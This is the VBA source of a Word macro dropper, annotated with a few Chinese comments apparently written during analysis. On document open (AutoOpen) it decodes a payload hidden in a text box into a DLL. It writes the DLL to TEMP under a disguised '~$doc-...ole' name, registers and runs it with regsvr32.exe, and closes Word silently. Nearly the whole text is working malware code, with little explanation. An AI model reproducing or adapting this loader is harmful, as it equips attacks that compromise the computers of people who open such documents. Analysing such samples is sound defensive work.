Attribute VB_Name = "Module1"

Global Str1 As String

' 为参数尾部拼接一个 \
Sub MakeString(ByRef arg1_str As String) 
    If Mid(arg1_str, Len(arg1_str), 1) <> "\" Then arg1_str = arg1_str & "\"
End Sub


Sub Fun2(ByRef Fun3() As Byte, Num1 As Long, ByRef Num2 As Long, ByRef Num3 As Long)
    Dim str3 As Byte

    str3 = Num3 Mod 256
    If Num2 <= Num1 Then
        Fun3(Num2) = str3
    End If
    
    Num3 = Num3 \ 256
    Num2 = Num2 + 1
End Sub

Sub Fun4(str As String, Num1 As Long, ByRef Num2 As Long, ByRef Num3 As Long)
    Dim Num4 As Long
    If Num2 <= Num1 Then
        Num4 = Asc(Mid(str, Num2, 1))
        Num4 = Num4 - 59
        Num3 = Num3 * 64
        Num3 = Num3 + Num4
    End If
    Num2 = Num2 + 1
End Sub

' 构造 DLL 数据，有必要分析一下
Sub Fun5(ByRef Fun6() As Byte, str As String)
    Dim Fun7 As Long
    Dim Num1 As Long
    Dim Num2 As Long
    Dim Num3 As Long
    Dim Num4 As Long
    Dim Num5 As Long
    
    Fun7 = UBound(Fun6)
    Num1 = 2063716
    Num2 = 1
    Do While (Num2 <= Num1)
        Num4 = 0
        For Num3 = 0 To 3
            Fun4 str, Num1, Num2, Num4
        Next Num3
        For Num3 = 0 To 2
            Fun2 Fun6, Fun7 + 3, Num5, Num4
        Next Num3
    Loop
End Sub

Sub AutoOpen()
    Dim str As String
    Dim Num_int As Integer
    Dim Fun_byte() As Byte
    Dim Str2 As String
    Dim str3 As String
    Dim object As Object
    
    Set object = Nothing
    For Each i In ActiveDocument.Shapes
        If i.Type = msoTextBox Then
            Set object = i
        End If
    Next i
    If object Is Nothing Then Exit Sub
    
	' 拼接得到 TEMP\~$doc-ad9b812a-88b2-454c-989f-7bb5fe98717e.ole
    str3 = "~$doc-ad9b812a-88b2-454c-989f-7bb5fe98717e.ole"
    OLE_DLL_FilePath = Environ$("TEMP")
    MakeString OLE_DLL_FilePath
    OLE_DLL_FilePath = OLE_DLL_FilePath & str3
    
	' .ole 文件（实际为.DLL）大小
    ReDim Fun_byte(1553407) As Byte
    Str1 = object.TextFrame.TextRange.Text
    Fun5 Fun_byte, Str1
    
	' 以二进制形式打开文件，生成该文件
    Num_int = FreeFile
    Open OLE_DLL_FilePath For Binary As #Num_int
    Put #Num_int, , Fun_byte
    Close #Num_int
    
	' Shell 执行命令
    Str2 = "regsvr32.exe """
    Str2 = Str2 & OLE_DLL_FilePath
    Str2 = Str2 & """"
    
    Shell Str2
    Application.Quit SaveChanges:=wdDoNotSaveChanges
End Sub






